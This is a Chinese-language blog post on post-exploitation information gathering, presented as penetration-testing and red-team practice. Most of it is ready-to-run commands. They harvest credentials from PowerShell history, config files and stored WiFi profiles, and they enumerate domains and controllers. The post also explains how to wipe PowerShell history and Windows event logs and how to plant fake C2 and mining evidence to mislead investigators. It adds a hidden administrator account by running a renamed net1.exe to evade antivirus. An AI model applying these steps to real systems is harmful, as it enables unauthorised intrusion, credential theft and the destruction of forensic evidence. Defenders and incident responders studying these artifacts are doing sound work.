數據收集的重要性（論滲透信息收集的重要性）

2023-10-13 08:59:19

前言

本文僅用於交流學習，由於傳播、利用此文所提供的信息而造成的任何直接或者間接的後果及損失，均由使用者本人負責，文章作者不為此承擔任何責任。

主機信息收集Windows主機信息收集PowerShell命令歷史記錄

可以使用powershell進行查看

powershell Get-Content (Get-PSReadlineOption).HistorySavePath

某些情況下，該命令可能無法使用，我們可先用dir查看powershell歷史命令記錄文件的存放位置，然後使用type進行讀取

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt%appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

【一>所有資源關注我，私信回復「資料」獲取<一】1、200份很多已經買不到的絕版電子書2、30G安全大廠內部的視頻資料3、100份src文檔4、常見安全面試題5、ctf大賽經典題目解析6、全套工具包7、應急響應筆記8、網絡安全學習路線
PS：打點時遇到Windows環境的文件下載漏洞，可下載以下文件進行敏感信息翻閱，某些運維會使用powershell進行管理工作組或域內機器，運氣好的可以找到ssh、資料庫這類登錄密碼或其它重要文件，尤其是一些運維用的腳本，裡面大多包含主機、資料庫登錄密碼，可通過powershell歷史記錄找到這些腳本的絕對路徑，然後在使用文件下載漏洞進行讀取，這也是一個不錯的突破點，而且這些歷史命令大多包含連結主機信息，可提取裡面的IP段，擴寬我們的攻擊面。
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
應急溯源的同學也可以看看這個文件，說不定會發現些蛛絲馬跡
滲透結束時，如果使用過powershell的，務必清除powershell命令歷史記錄，在一定程度上可以減少被溯源成功的概率，當然，也可以迷惑藍隊，寫入一些奇怪的命令，例如把上線的C2地址更改為境外的已公開IOC情報的挖礦IP，然後丟進來幾個挖坑樣本，誤導藍隊進行溯源消耗防守方的精力，偽造痕跡的時候記得更改文件時間，還得注意下語言文字這些細節，不然藍隊看到中文名字、錯誤語法和時間的挖礦，結合攻防演練時間，第一時間肯定會知道這是偽造出來的，如果內網存在IDS這樣的流量審計設備，藍隊一定位機器查看設備流量，說不定還可能暴露我們的蹤跡。
清除powershell歷史運行命令記錄
powershell Remove-Item (Get-PSReadlineOption).HistorySavePath
查看歷史打開文件
這目錄裡面放著電腦的歷史打開文件記錄，看過什麼文件、什麼時候，包括點過那幾個盤，都很詳細的記錄，我們可通過該目錄定位運維常用的文件夾、文件等，尋找敏感信息，查看這個目錄往往有奇效，很多時候運維為了方便管理機器喜歡用密碼小本本來記錄各個機器的密碼，畢竟一個運維管理幾十臺機器是非常常見，這麼多密碼不一定記得住，所以大多數運維會選擇把機器密碼記錄在txt、xls這種文件裡，這也就給了我們可乘之機，其實我在這個目錄遇到最多的還是運維寫的日報、周報，很多時候這些報告裡面包含了大量伺服器信息，這時候我們就可以通過這些敏感信息進一步內網橫向。
recent
大多數時候我們的起點都是webshell權限，如果沒有判斷管理員是否在線，是否有IDS這種流量檢測設備，那麼在第一時間最好不要冒然遠程過去，不然就是得不償失了；recent無法使用，這時候我們可以使用dir讀取歷史打開文件，然後再利用dir搜索關鍵字得到文件的絕對路徑，這樣我們就可以直接在webshell中進行查看或下載回來本地打開了。
dir %APPDATA%\Microsoft\Windows\Recentdir C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recentdir /a /s /b c:\password.txt
其它的常用關鍵字搜索，
dir /a /s /b c:\*.conf *.ini *.inc *.config dir /a /s /b c:\conf.* config.* dir /a /s /b c:\*.txt *.xls *.xlsx *.docxfindstr /s /i /n /d:C:\ /c:"pass" *.config
某些時候顯示內容過多，可對這些關鍵字進行逐個搜索，或使用findstr進行過濾，如:
dir /a /s /b c:\*.conf *.ini *.inc *.config | findstr "運維"dir /a /s /b c:\*.txt *.xls *.xlsx *.docx | findstr "密碼"
另外可到回收站翻翻，很多時候會有驚喜。
前面說到了recent目錄記錄到了查看歷史打開文件，在後滲透時，我們通常會往目標機子上傳各種文件，例如nps、mimikatz、psexec等，這些工具在使用過程中，大多會在recent目錄產生記錄，這時候為了更好的隱藏痕跡，我們可以rd命令刪除運行記錄或直接使用CS或webshell管理工具提供的文件管理功能刪除該記錄，另外psexec成功登錄退出後，會在目標機器的安全日誌中產生Event 4624、4628、4634，在系統日誌中產生Event 7045（記錄PSEXESVC安裝）、Event 7036（記錄PSEXESVC服務狀態），Windows日誌也需要處理下；關於清理痕跡不是本文的主題，就不多贅述了，對於應急的同學可以多關注下recent文件夾和Windows日誌，在不手動清理或者使用某些安全工具清理垃圾的時候，recent這個目錄為空或者很少東西，那麼應該要注意下了。
rd /s 文件
windows 日誌路徑：
系統日誌：%SystemRoot%\System32\Winevt\Logs\System.evtx安全日誌：%SystemRoot%\System32\Winevt\Logs\Security.evtx應用程式日誌：%SystemRoot%\System32\Winevt\Logs\Application.evtx日誌在註冊表的鍵：HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\EventlogIIS默認日誌位置：%SystemDrive%\inetpub\logs\LogFiles\W3SVC1\
powershell清除Windows事件日誌
PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}
PS：上傳後的文件如果不能刪除（沒權限或其它因素），那麼可以上傳或新建同名文件，覆蓋掉原有文件。
敏感文件尋找伺服器、中間件、資料庫這類配置文件。運維密碼、工作記錄、個人記錄這些。公司文件、合同、網絡拓撲圖這類。……
伺服器、中間件、資料庫這類配置文件的重要性大家都懂，滲透的時候如果獲取到一個包含大量敏感信息的配置文件，那將會為我們在後滲透作出良好的鋪墊，如下。
某次項目時，拿到一個存在內網的shell，通過對主機信息收集，發現某配置文件Config-back.xml包含了大量的資料庫帳號密碼，之後使用CS下載該配置文件到本地，然後搭建代理利用這些帳號密碼批量上線MSSQL主機，再結合這些密碼製作出高質量字典爆破C段機器，用了不到30分鐘拿到了200多臺機器權限，所以說滲透的本質是信息搜集，信息搜集的量決定著我們滲透的成果，關於配置文件的查找這裡就不多說了，可參考上面的dir命令進行查找。
dir /a /s /b d:\conf.* config.*
另外就是要多關注下web系統本身存放的文件，之前遇到過一個IBM系統，裡面有個雲盤功能，之後翻這個功能模塊找到了個運維建立的文件夾，裡面存放了大量的數據，什麼網絡拓撲圖、運維日誌、甚至還有帳號密碼，還有的就是做等保滲透的時候，遠程到運維機，桌面一大堆設備清單，還有各個系統的帳號密碼，而且這些xlsx表格都是不加密的，直接打開就能查看，一些運維為了貪圖方便，往往會非常嚴重的安全隱患，給了入侵者很大的機會。
這裡再補充一下WiFi密碼獲取這個點，在內網滲透，密碼獲取到的越多，路就越好走，很多時候內網的密碼都是通用的，就算是不通用，大部分的密碼也是有規律可循的，關於密碼的獲取可使用LaZagnecmd獲取WiFi密碼
netsh wlan show profilesnetsh wlan show profiles key=clear通過for循環一次性獲取全部WiFi密碼for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
如果已經取得當前機器的管理員權限的話，可運行mimikatz、procdump之類憑據獲取工具獲取系統憑據，因為多數管理員可能使用同一密碼或有規律性的密碼來管理多臺伺服器，如果能夠得到主機密碼或者hash就可以嘗試pth或psexec批量上線了；還有就是在進程收集的時候要多留意一下是否有域管啟用的進程，如果剛好域管理員登錄過我們已經有權限的機器，那麼就可以利用域管進程進行橫向了，如果沒有的話可關注下ms14068，域委派這類東西，這些都是後滲透基本常識了，這裡不多贅述。
域信息收集常用命令
常用命令
net use 查看ipc連接情況net user /domain 獲取域用戶列表net user test 123 /add 添加用戶neet localgroup administrators test /add 添加test用戶到管理組，一般情況下，管理組才能遠程桌面net group /domain 查詢域裡面的組net group "domain admins" /domain 獲取域管理員列表net group "enterprise admins" /domain 查看當前域中企業管理員組用戶net group "domain computers" /domain 查看當前域中的所有的計算機名（登錄過該域的計算機）net group "exchange servers" /domain 查看域內是否存在Exchangenet group "domain controllers" /domain 查看域控制器(如果有多臺)net config workstation 查看當前登錄域net view 查看同一域內機器列表net view \\IP 查看某IP共享net view \\test 查看test計算機的共享資源列表net view /domain 查看內網存在多少個域Net view /domain:test 查看test域中的機器列表wmic useraccount get Caption,sid 獲取域內所有用戶sidsetspn -T target.com -Q */* 獲取當前域內所有spnfor /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i"ttl"for /l %i in (1,1,255) do @ping 10.10.10.%i -w 1 -n 1 | find /i"ttl"
網絡信息查找
ipconfig /all 查看當前主機的主機名/IP/DNS等信息route print 查看路由表信息netstat -ano 查看埠開放情況，有些時候能獲取到別的IP段arp -a 查看arp解析情況
尋找內網網段時建議被動尋找，主動尋找動靜太大，如nmap、nbtscan這種一掃，可能整個網段內存活的機器就出來了，但隨之而來的是IDS的流量審計，一旦引起流量異常被藍隊察覺，可能就會導致我們權限的丟失，永遠不要小瞧藍隊，而且還是擁有各種安全設備的藍隊，內網滲透一定要謹慎，大規模資產掃描，自動化漏洞掃描我一般會留到最後才上的。
定位域控
查看域時間，一般域控會做時間伺服器
net time /domain
通過dns定位域控
ipconfig /allipconfig /displaydns 有些時候可以在dns緩存得到域控信息
利用netdom獲取域控列表，得到域控名稱可通過ping獲取域控IP
netdom query dc
其它信息查找
systeminfo 查看補丁情況，也能看到當前機器是否加入域環境net group "domain controllers" /domain 查詢域控nslookup -type=SRV _ldap._tcp.corp 通過srv記錄獲取域控地址nltest /dclist:corp 使用nltest查詢域控列表tasklist /svc 查看進程及對應服務名cmdkey /l 查看當前保存的登陸憑證type c:\Windows\system32\drivers\etc\hosts 可以發現些內網IP
其它補充
web日誌
有些老系統會使用get 明文的方式傳輸後臺登錄帳號密碼，我們可翻查下web日誌，說不定有收穫，還有就是要注意系統本身的日誌，這些日誌大多包含內網IP段，甚至還有帳號密碼這些東西。
另外可找找ftp，很多時候內網FTP都是可以未授權訪問的，就算有密碼，大多都是弱口令或規律性、通用性的密碼，是否能成功登陸就要看我們信息收集的深度了，FTP大多包含部門或公司敏感文件，可多關注一下。
使用net1.exe繞過殺軟添加用戶
windows環境滲透添加用戶往往會被AV攔截，而且還會產生告警日誌，這時候可使用net1.exe繞過殺軟添加用戶，當然，也可使用cs自帶的argue參數汙染進行用戶添加。
net1.exe
cd c:/windows/system32copy net1.exe svchost.txtsvchost.txt user svchost M@Bas#as#@123 /addnet localgroup administrators svchost /addsvchost.txt user svchost M@Bas#as#@123 /add & net localgroup administrators svchost /add
argue參數汙染
net1 argue net1 aaaaaaaaaaaaaaaaaaaaaaaassssssssssssssssssssssssssssssssssssssssssssssssssexecute net1 user svchost M@Bas#as#@123 /addexecute net1 localgroup administrators svchost /add
正常使用net添加用戶會被火絨攔截
刪除用戶火絨也無感知
添加用戶並加到管理員組
m1kh.txt user m1kh M@Bas#as#@123 /add & net localgroup administrators m1kh /add
linux主機信息收集網絡信息收集
last 多數運維會接入內網登錄系統，這時候，便可獲取部分內網ip 進而對內網IP段進行畫像Ifconfig -a/arp -a/netstat -anopt/ss -nt 這些就不多說了Route -n 內網路由情況，也能為內網網絡拓撲提供一定的信息IPtables 防火牆情況，有時候會存在內網網絡通行規則，也能提供一定信息....
敏感文件收集
grep "password:" * -Rnfind / -name "config.*"find / -name "databases.*"find / -name "config.*" | xargs grep "password""
其它補充history
history 在linux滲透時是非常實用的，各種連接密碼，ssh、mysql、ftp等等，在拿到權限是應該著重看看這個文件
資料庫
取得資料庫權限後，除了收集帳號密碼外，也可翻查一下日誌、登錄記錄這些看看有沒有內網的其它IP資產，遇到過多個站點共用一個mysql資料庫的情況，然后里面記錄了多個系統的後臺帳號密碼，我們可以利用這些帳號密碼登錄其它系統進行漏洞挖掘，遇到後臺文件上傳、rce這些說不定還能上線一臺主機，多一個內網據點。
日誌
linux的那些日誌就不多說了，需要注意的是GET傳參登錄的系統，可多看看日誌，收集到帳號密碼對後續滲透會有所幫助，當然，大部分時候我們需要webshell權限才能查看日誌，這時候我們可以掃描下目錄找找日誌，或結合Spring boot httptrace進行利用。
再談談資料庫內的日誌記錄，有些資料庫兼具日誌記錄功能，會記錄到用戶登錄的IP，在拿下資料庫權限後，可找找有沒有這些東西，說不定就能獲取到另一個內網IP段了，增大我們橫向的攻擊面。
其它的就是ssh私鑰和運維腳本這些了，說到底信息收集還是需要結合目標場景而定。
小結
以上只是一些個人見解，說的也比較片面、不全，我認為滲透需要隨機應變，日復一日用這同樣的方式解決同樣的問題，思維就會變得僵化了，這樣會導致我們在滲透時變得不再仔細審視和認真思考，用僵化的思維去做滲透往往會使我們錯失良機，在攻防過程中除了需要保持良好的心態與清晰的思路外，更要不斷的進行思考以避免失誤。
,